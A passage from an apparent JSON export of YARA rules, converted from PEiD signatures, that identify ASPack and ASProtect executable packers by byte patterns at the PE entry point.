5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_1061b_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED EA A8 43 00 B8 E4 A8 43 00 03 C5 2B 85 78 AD 43 00 89 85 84 AD 43 00 80 BD 6E AD 43 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v21_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 48 11 00 00 C3 83 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_106b_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 90 75 00 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_Hint_WIN_EP: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? EB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 72 05 ?? ?? EB }\r\n $b = { 60 E8 70 05 00 00 EB 4C }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v2001: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 72 05 ?? ?? EB 33 87 DB }\r\n $b = { 60 E8 72 05 00 00 EB 4C }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_211d_emadicius: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? E8 0D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 58 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108x: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D BB 03 }\r\n $b = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v1061b: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 5D 81 ED B8 03 C5 2B 85 0B DE 89 85 17 DE 80 BD 01 }\r\n $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10801: PEiD\r\n{\r\n strings:\r\n $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 44 BB 10 44 03 DD 2B }\r\n $b = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10802: PEiD\r\n{\r\n strings:\r\n $a = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 ?? BB 10 6A 44 ?? 03 DD 2B 9D }\r\n $b = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10803: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 0A 4A 44 ?? BB 04 4A 44 ?? 03 }\r\n $b = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_107b_DLL: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 3E D9 43 00 B8 38 D9 43 00 03 C5 2B 85 0B DE 43 00 89 85 17 DE 43 00 80 BD 01 DE 43 00 00 75 15 FE 85 01 DE 43 00 E8 1D 00 00 00 E8 79 02 00 00 E8 12 03 00 00 8B 85 03 DE 43 00 03 85 17 DE 43 00 89 44 24 1C 61 FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_DLL_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic: PEiD\r\n{\r\n strings:\r\n $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 F9 11 00 00 C3 83 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Hint_WIN_EP_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 90 75 01 90 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_212withouth_Poly_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { ?? E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10803_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v104b: PEiD\r\n{\r\n strings:\r\n $a = { 75 ?? }\r\n $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v105b: PEiD\r\n{\r\n strings:\r\n $a = { 90 75 ?? }\r\n $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_211d_emadicius_additional: PEiD\r\n{\r\n strings:\r\n $a = { EB 03 3A 4D 3A 1E EB 02 CD 20 9C EB 02 CD 20 EB 02 CD 20 60 EB 02 C7 05 EB 02 CD 20 E8 03 00 00 00 E9 EB 04 58 40 50 C3 61 9D 1F EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108: PEiD\r\n{\r\n strings:\r\n $a = { 90 90 75 01 FF }\r\n $b = { 90 75 01 FF E9 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102b_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 8A 1C 40 00 B9 9E 00 00 00 8D BD 4C 23 40 00 8B F7 33 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v106b: PEiD\r\n{\r\n strings:\r\n $a = { 90 90 75 ?? }\r\n $b = { 90 90 90 75 00 E9 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v104b_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_V22_Alexey_Solodovnikov_StarForce_2009408: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD ?? ?? ?? ?? ?? ?? 83 BD 7D 04 00 00 00 89 9D 7D 04 00 00 0F 85 C0 03 00 00 8D 85 89 04 00 00 50 FF 95 09 0F 00 00 89 85 81 04 00 00 8B F0 8D 7D 51 57 56 FF 95 05 0F 00 00 AB B0 00 AE 75 FD 38 07 75 EE 8D 45 7A FF E0 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 56 69 72 74 75 61 6C 46 72 65 65 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 8B 9D 8D 05 00 00 0B DB 74 0A 8B 03 87 85 91 05 00 00 89 03 8D B5 BD 05 00 00 83 3E 00 0F 84 15 01 00 00 6A 04 68 00 10 00 00 68 00 18 00 00 6A 00 FF 55 51 89 85 53 01 00 00 8B 46 04 05 0E 01 00 00 6A 04 68 00 10 00 00 50 6A 00 FF 55 51 89 85 4F 01 00 00 56 8B 1E 03 9D 7D 04 00 00 FF B5 53 01 00 00 FF 76 04 50 53 E8 2D 05 00 00 B3 00 80 FB 00 75 5E FE 85 E9 00 00 00 8B 3E 03 BD 7D 04 00 00 FF 37 C6 07 C3 FF D7 8F 07 50 51 56 53 8B C8 83 E9 06 8B B5 4F 01 00 00 33 DB 0B C9 74 2E 78 2C AC 3C E8 74 0A EB 00 3C E9 74 04 43 49 EB EB 8B 06 EB 00 ?? ?? ?? 75 F3 24 00 C1 C0 18 2B C3 89 06 83 C3 05 83 C6 04 83 E9 05 EB CE 5B 5E 59 58 EB 08 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108x_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10801_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D }\r\n $b = { 60 EB ?? 5D EB ?? FF ?? ?? ?? ?? ?? E9 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v100b: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 5D 81 ED D2 2A 44 B8 CC 2A 44 03 C5 2B 85 A5 2E 44 89 85 B1 2E 44 80 BD 9C 2E }\r\n $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_102b_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 2B 85 7D 7C 43 00 89 85 89 7C 43 00 80 BD 74 7C 43 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 5D 81 ED 96 78 43 B8 90 78 43 03 C5 2B 85 7D 7C 43 89 85 89 7C 43 80 BD 74 7C }\r\n $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v102b: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 96 78 43 ?? B8 90 78 43 ?? 03 }\r\n $b = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v108x_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E9 ?? ?? ?? ?? EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211b_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v105b_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_211_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 60 E9 3D 04 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_212b_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { ?? 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB EC FF FF FF 03 DD 81 EB 00 ?? ?? 00 83 BD 22 04 00 00 00 89 9D 22 04 00 00 0F 85 65 03 00 00 8D 85 2E 04 00 00 50 FF 95 4C 0F 00 00 89 85 26 04 00 00 8B F8 8D 5D 5E 53 50 FF 95 48 0F 00 00 89 85 4C 05 00 00 8D 5D 6B 53 57 FF 95 48 0F }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v1061b_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_DLL_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}"
},
{
"id": 112,
"key": "yara_detect_asprotect",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Detect_Asprotect",
"rule": "rule ASProtect_v123_RC1: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_130824_beta: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 89 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov_h1: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 1B 00 00 00 E9 FC 8D B5 0F 06 00 00 8B FE B9 97 00 00 00 AD 35 78 56 34 12 AB 49 75 F6 EB 04 5D 45 55 C3 E9 ?? ?? ?? 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_vxx: PEiD\r\n{\r\n strings:\r\n $a = { 60 ?? ?? ?? ?? ?? 90 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 03 DD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_vxx_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 90 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect_Anorganix_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_23_SKE_build_0426_Beta_additional: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 60 40 00 E8 01 00 00 00 C3 C3 0D 6C 65 3E 09 84 BB 91 89 38 D0 5A 1D 60 6D AF D5 51 2D A9 2F E1 62 D8 C1 5A 8D 6B 6E 94 A7 F9 1D 26 8C 8E FB 08 A8 7E 9D 3B 0C DF 14 5E 62 14 7D 78 D0 6E }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x_New_Strain_additional: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 ?? ?? ?? E8 01 ?? ?? ?? C3 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_BRS_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E9 ?? 05 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x_additional: PEiD\r\n{\r\n strings:\r\n $a = { 00 00 68 01 ?? ?? ?? C3 AA }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_V2X_DLL_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 ?? ?? 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ?? ?? ?? ?? 03 DD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v132: PEiD\r\n{\r\n strings:\r\n $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 01 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_h2_additional: PEiD\r\n{\r\n strings:\r\n $a = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_12_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 ?? ?? ?? C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov_h: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov_h1_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 ?? 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v20_additional: 